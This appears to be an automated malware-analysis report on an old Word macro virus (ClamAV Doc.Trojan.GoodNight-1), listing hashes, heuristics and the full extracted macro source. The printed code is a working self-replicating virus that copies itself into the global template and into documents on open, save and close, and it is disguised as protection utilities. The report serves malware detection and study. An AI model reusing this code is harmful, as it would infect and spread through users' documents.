Office (OLE) malware analysis — malicious · 46826ca7e1e22d0e

MALICIOUS

Office (OLE)

56.0 KB Created: 1998-03-16 10:51:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-30

MD5: 8cd927db58a3889deb69b03a87c2e850 SHA-1: b8168934a9f4f8c16227dc37956817dd1ab481b5 SHA-256: 46826ca7e1e22d0e5fb3a6916fb6c0ad0ec30e8f06dc5998c3212ff6e32f8fdf

196 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Doc.Trojan.GoodNight-1. It contains legacy WordBasic and VBA macros, including an AutoOpen macro designed to copy other macros to the global template. The 'SE_ENABLE_LURE' heuristic indicates the document likely prompts the user to enable macros, a common tactic for malware droppers.

Heuristics 6

ClamAV: Doc.Trojan.GoodNight-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.GoodNight-1
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "AutoOpen"
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
WordBasic.MacroCopy DocName$ + ":AutoClose", "Global:AutoClose"
```
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7698 bytes
SHA-256: `2821c925383c105e03f290ad9d2c9bf2aa5c19544decf5959b79a5f59c8c4aec`
Detection ClamAV: Doc.Trojan.GoodNight-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "AutoOpen" Public Sub MAIN() Attribute MAIN.VB_Description = "Checks Page Size; if not default Page Size, converts document to default Page Size. FWTMPv7.0" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN" Dim DocName$ On Error GoTo -1: On Error GoTo skip DocName$ = WordBasic.[FileName$]() WordBasic.MacroCopy DocName$ + ":AutoExec", "Global:AutoExec" WordBasic.MacroCopy DocName$ + ":AutoExit", "Global:AutoExit" WordBasic.MacroCopy DocName$ + ":AutoClose", "Global:AutoClose" WordBasic.MacroCopy DocName$ + ":FileClose", "Global:FileClose" WordBasic.MacroCopy DocName$ + ":FileCloseAll", "Global:FileCloseAll" WordBasic.MacroCopy DocName$ + ":FileSave", "Global:FileSave" WordBasic.MacroCopy DocName$ + ":FileSaveAs", "Global:FileSaveAs" WordBasic.MacroCopy DocName$ + ":FileOpen", "Global:FileOpen" WordBasic.MacroCopy DocName$ + ":AutoOpen", "Global:AutoOpen" WordBasic.MacroCopy DocName$ + ":Exit", "Global:Exit" skip: End Sub Attribute VB_Name = "AutoExec" Public Sub MAIN() Attribute MAIN.VB_Description = "kinko's KHQ mesage:\r""AutoMacros are now turned off!""" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoExec.MAIN" WordBasic.DisableAutoMacros WordBasic.MsgBox "Auto Macros disabled" End Sub Attribute VB_Name = "AutoExit" Public Sub MAIN() Attribute MAIN.VB_Description = "ScanProt macro to protect and disinfect your Normal (Global) template." Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoExit.MAIN" Dim DocName$ On Error GoTo -1: On Error GoTo bail DocName$ = WordBasic.[FileName$]() WordBasic.FileSaveAs Format:=1 WordBasic.MacroCopy "Global:AutoExec", DocName$ + ":AutoExec" WordBasic.MacroCopy "Global:AutoExit", DocName$ + ":AutoExit" WordBasic.MacroCopy "Global:AutoClose", DocName$ + ":AutoClose" WordBasic.MacroCopy "Global:FileClose", DocName$ + ":FileClose" WordBasic.MacroCopy "Global:FileCloseAll", DocName$ + ":FileCloseAll" WordBasic.MacroCopy "Global:FileSave", DocName$ + ":FileSave" WordBasic.MacroCopy "Global:FileOpen", DocName$ + ":FileOpen" WordBasic.MacroCopy "Global:AutoOpen", DocName$ + ":AutoOpen" WordBasic.MacroCopy "Global:Exit", DocName$ + ":Exit" bail: End Sub Attribute VB_Name = "FileClose" Public Sub MAIN() Attribute MAIN.VB_Description = "Closes all of the windows of the active document" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileClose.MAIN" Dim DocName$ On Error GoTo -1: On Error GoTo bail DocName$ = WordBasic.[FileName$]() WordBasic.FileSaveAs Format:=1 WordBasic.MacroCopy "Global:AutoExec", DocName$ + ":AutoExec" WordBasic.MacroCopy "Global:AutoExit", DocName$ + ":AutoExit" WordBasic.MacroCopy "Global:AutoClose", DocName$ + ":AutoClose" WordBasic.MacroCopy "Global:FileClose", DocName$ + ":FileClose" WordBasic.MacroCopy "Global:FileCloseAll", DocName$ + ":FileCloseAll" WordBasic.MacroCopy "Global:FileSave", DocName$ + ":FileSave" WordBasic.MacroCopy "Global:FileOpen", DocName$ + ":FileOpen" WordBasic.MacroCopy "Global:AutoOpen", DocName$ + ":AutoOpen" WordBasic.MacroCopy "Global:Exit", DocName$ + ":Exit" bail: WordBasic.FileClose End Sub Attribute VB_Name = "FileCloseAll" Public Sub MAIN() Attribute MAIN.VB_Description = "Closes all of the windows of all documents" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileCloseAll.MAIN" Dim DocName$ On Error GoTo -1: On Error GoTo bail DocName$ = WordBasic.[FileName$]() WordBasic.FileSaveAs Format:=1 WordBasic.MacroCopy "Global:AutoExec", DocName$ + ":AutoExec" WordBasic.MacroCopy "Global:AutoExit", DocName$ + ":AutoExit" WordBasic.MacroCopy "Global:AutoClose", DocName$ + ":AutoClose" WordBasic.MacroCopy "Global:FileClose", DocName$ + ":FileClose" WordBasic.MacroCopy "Global:FileCloseAll", DocName$ + ":FileCloseAll" WordBasic.MacroCopy "Global:FileSave", DocName$ + ":FileSave" WordBasic.MacroCopy "Global:FileOpen", DocName$ + ":FileOpen" WordBasic.MacroCopy "Global:AutoOpen", DocName$ + ":AutoOpen" WordBasic.MacroCopy "Global:Exit", DocName$ + ":Exit" bail: WordBasic.FileCloseAll End Sub Attribute VB_Name = "FileSave" Public Sub MAIN() Attribute MAIN.VB_Description = "Saves the active document or template" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN" Dim DocName$ On Error GoTo -1: On Error GoTo bail DocName$ = WordBasic.[FileName$]() WordBasic.FileSaveAs Format:=1 WordBasic.MacroCopy "Global:AutoExec", DocName$ + ":AutoExec" WordBasic.MacroCopy "Global:AutoExit", DocName$ + ":AutoExit" WordBasic.MacroCopy "Global:AutoClose", DocName$ + ":AutoClose" WordBasic.MacroCopy "Global:FileClose", DocName$ + ":FileClose" WordBasic.MacroCopy "Global:FileCloseAll", DocName$ + ":FileCloseAll" WordBasic.MacroCopy "Global:FileSave", DocName$ + ":FileSave" WordBasic.MacroCopy "Global:FileSaveAs", DocName$ + ":FileSaveAs" WordBasic.MacroCopy "Global:FileOpen", DocName$ + ":FileOpen" WordBasic.MacroCopy "Global:AutoOpen", DocName$ + ":AutoOpen" WordBasic.MacroCopy "Global:Exit", DocName$ + ":Exit" bail: End Sub Attribute VB_Name = "FileSaveAs" Public Sub MAIN() Attribute MAIN.VB_Description = "Saves a copy of the document in a separate file" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN" Dim DocName$ Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False) WordBasic.CurValues.FileSaveAs dlg WordBasic.Dialog.FileSaveAs dlg WordBasic.FileSaveAs dlg On Error GoTo -1: On Error GoTo bail DocName$ = WordBasic.[FileName$]() WordBasic.FileSaveAs Format:=1 WordBasic.MacroCopy "Global:AutoExec", DocName$ + ":AutoExec" WordBasic.MacroCopy "Global:AutoExit", DocName$ + ":AutoExit" WordBasic.MacroCopy "Global:AutoClose", DocName$ + ":AutoClose" WordBasic.MacroCopy "Global:FileClose", DocName$ + ":FileClose" WordBasic.MacroCopy "Global:FileCloseAll", DocName$ + ":FileCloseAll" WordBasic.MacroCopy "Global:FileSave", DocName$ + ":FileSave" WordBasic.MacroCopy "Global:FileSaveAs", DocName$ + ":FileSaveAs" WordBasic.MacroCopy "Global:FileOpen", DocName$ + ":FileOpen" WordBasic.MacroCopy "Global:AutoOpen", DocName$ + ":AutoOpen" WordBasic.MacroCopy "Global:Exit", DocName$ + ":Exit" bail: End Sub Attribute VB_Name = "FileOpen" Public Sub MAIN() Attribute MAIN.VB_Description = "Opens an existing document or template" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileOpen.MAIN" Dim DocName$ Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False) WordBasic.CurValues.FileOpen dlg WordBasic.Dialog.FileOpen dlg WordBasic.FileOpen dlg On Error GoTo -1: On Error GoTo skip DocName$ = WordBasic.[FileName$]() WordBasic.MacroCopy DocName$ + ":AutoExec", "Global:AutoExec" WordBasic.MacroCopy DocName$ + ":AutoExit", "Global:AutoExit" WordBasic.MacroCopy DocName$ + ":AutoClose", "Global:AutoClose" WordBasic.MacroCopy DocName$ + ":FileClose", "Global:FileClose" WordBasic.MacroCopy DocName$ + ":FileCloseAll", "Global:FileCloseAll" WordBasic.MacroCopy DocName$ + ":FileSave", "Global:FileSave" WordBasic.MacroCopy DocName$ + ":FileSaveAs", "Global:FileSaveAs" WordBasic.MacroCopy DocName$ + ":FileOpen", "Global:FileOpen" WordBasic.MacroCopy DocName$ + ":AutoOpen", "Global:AutoOpen" WordBasic.MacroCopy DocName$ + ":Exit", "Global:Exit" skip: End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.